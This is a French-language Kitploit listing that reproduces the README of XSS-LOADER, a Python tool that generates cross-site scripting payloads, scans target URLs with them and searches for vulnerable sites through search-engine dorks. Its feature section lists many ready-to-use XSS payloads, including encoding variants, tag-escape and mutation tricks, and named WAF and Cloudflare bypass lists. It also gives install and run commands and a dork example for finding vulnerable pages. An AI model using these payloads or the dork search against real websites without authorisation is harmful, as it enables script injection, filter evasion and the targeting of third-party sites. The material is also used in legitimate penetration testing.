Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
XSS-LOADER — Générateur de Payload Xss ~ Scanner Xss ~ Dork Finder Xss | Kitploit
Outils/GitHubGitHub/capture0x/xss-loader
Scanners de Vulnérabilités WebGénération de PayloadsExploitation d'Applications WebContournement de WAFTests d'Intrusion
GitHubcapture0x/xss-loader

XSS-LOADER

Générateur de Payload Xss ~ Scanner Xss ~ Dork Finder Xss

Voir le dépôt
621123il y a 3 moisVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

💎   XSS-LOADER OUTILS   💎

Écrit par TMRSWRR

Version 1.0.0

Tout-en-un pour GÉNÉRATEUR DE PAYLOAD XSS - SCANNER XSS - TROUVEUR DE DORK XSS

Instagram: TMRSWRR

📷 Captures d'écran 📷

👇 💌 Comment utiliser 💌 👇

Comment utiliser

📒 Lisez-moi 📒

  • Cet outil crée des payloads pour une utilisation dans l'injection XSS
  • Sélectionnez les tags de payload par défaut depuis le paramètre ou écrivez votre payload
  • Il effectue une injection XSS avec le paramètre Xss Scanner
  • Il trouve les URL de sites vulnérables avec le paramètre Xss Dork Finder

💿 Installation 💿

Installation avec requirements.txt

root@kitploit:~
git clone https://github.com/capture0x/XSS-LOADER/
cd XSS-LOADER
pip3 install -r requirements.txt

Utilisation

root@kitploit:~
python3 payloader.py

🗃️ Fonctionnalités 🗃️

*Payload de base

Définit le paramètre par défaut à :<script>alert(1)</script>

*Payload Div

Définit le paramètre par défaut à :<div onpointerover='alert(1)'>MOVE HERE</div

*Payload Img

Définit le paramètre par défaut à :``````

*Payload Body

Définit le paramètre par défaut à :<body ontouchstart=alert(1)>

*Payload Svg

Définit le paramètre par défaut à :<svg onload=alert('1')>

*Saisissez votre payload

Encode le payload écrit par l'utilisateur

*Paramètre du générateur de payload

Encode le payload sur le tag sélectionné

root@kitploit:~
* |   1.  MAJUSCULE---->  <SCRIPT>ALERT(1)</SCRIPT>              
* |   2.  MAJUSCULE ET MINUSCULE----> <ScRiPt>aleRt(1)</ScRiPt>   
* |   3.  ENCODAGE URL ----->   %3Cscript%3Ealert%281%29%3C%2Fscript%3E           
* |   4.  ENCODAGE ENTITÉ HTML----->  &lt;script&gt;alert(1)&lt;/script&gt; 
* |   5.  PAYLOAD SPLITÉ ----->  <scri</script>pt>>alert(1)</scri</script>pt>>       
* |   6.  ENCODAGE HEX ----->  3c7363726970743e616c6572742831293c2f7363726970743e       
* |   7.  ENCODAGE UTF-16 -----> Encode payload to utf-16 format.   
* |   8.  ENCODAGE UTF-32----->  Encode payload to utf-32 format.          
* |   9.  SUPPRIMER TAG -----> ";alert('XSS');//            
* |  10.  ENCODAGE UNICODE----->    %uff1cscript%uff1ealert(1)%uff1c/script%uff1e         
* |  11.  ENCODAGE US-ASCII ----->  ¼script¾alert(1)¼/script¾      
* |  12.  ENCODAGE BASE64 ----->   PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==          
* |  13.  ENCODAGE UTF-7 ----->   +ADw-script+AD4-alert(1)+ADw-/script+AD4-           
* |  14.  BYPASS PAR PARENTHÈSES ----->  <script>alert`1`</script>   
* |  15.  ENCODAGE UTF-8 ----->  %C0%BCscript%C0%BEalert%CA%B91)%C0%BC/script%C0%BE          
* |  16.  ÉVASION DE BLOC TAG-----> "><script>alert(1)</script>
* |  17.  ÉVASION DE SCRIPT----->  </script><script>alert(1)</script>
* |  18.  PAYLOAD DE TÉLÉCHARGEMENT DE FICHIER-----> "><script>alert(1)</script>.gif
* |  19.  BYPASS DANS LES COMMENTAIRES-----> <!--><script>alert(1)</script>-->
* |  20.  PAYLOAD DE MUTATION-----> <noscript><p title="</noscript><script>alert(1)</script>">
* |  21.  IMG MALFORMÉE-----> <script>alert(1)</script>">
* |  22.  BYPASS PAR ESPACE-----> 
* |  23.  BLOC DOWNLEVEL-HIDDEN-----> <!--[if gte IE 4]><script>alert(1)</script><![endif]-->
* |  24.  PAYLOADS DE BYPASS WAF-----> Show Waf Bypass Payload List
* |  25.  PAYLOADS DE BYPASS CLOUDFLARE-----> Show Cloudflare Bypass Payload List
* |  26.  PAYLOADS POLYGLOT-----> Show Polyglot Bypass Payload List
* |  27.  PAYLOADS ALERT-----> Show Alert Payload List
* |  28.  CRÉER TOUS LES PAYLOADS-----> Show Create All Payloads
* |  29.  RETOUR AU MENU PRINCIPAL
* |  30.  QUITTER

*Scanner XSS

Initialement, vous devrez entrer l'URL de la cible Veuillez entrer l'URL comme cet exemple==>p.ex. cible -----> http://target.com/index.php?name= Sélectionné pour la liste de payloads à scanner

  • LISTE DE PAYLOADS DE BASE ==> Liste de payloads composée de tags script
  • LISTE DE PAYLOADS DIV ==> Liste de payloads composée de tags div
  • LISTE DE PAYLOADS IMG ==> Liste de payloads composée de tags img
  • LISTE DE PAYLOADS BODY ==> Liste de payloads composée de tags body
  • LISTE DE PAYLOADS SVG ==> Liste de payloads composée de tags svg
  • LISTE DE PAYLOADS MIXTE ==> Liste de payloads composée de tous les tags
  • ENTRER LE CHEMIN DU FICHIER ==> Liste de payloads déterminée par l'utilisateur, veuillez entrer l'URL comme cet exemple..! (p.ex. chemin -----> /usr/share/wordlists/wfuzz/Injections/XSS.txt)

Les résultats seront ajoutés dans "vulnpayload.txt" après le scan.

*Trouveur de Dork XSS

Entrez d'abord le dork pour la recherche: p.ex.---->inurl:"search.php?q=" Les résultats seront enregistrés dans "dork.txt" après le scan.

Problèmes connus

Résolus :

  • Erreurs Unicode

  • Erreurs de module

Important :

Si vous souhaitez utiliser l'outil pour python3 installé sur Windows, téléchargez le lien ci-dessous :

https://github.com/capture0x/XSS-LOADER-for-WINDOWS

Bogues et améliorations

Pour les rapports de bogues ou les améliorations, veuillez ouvrir une issue ici.

Copyright 2020

Télécharger l’outil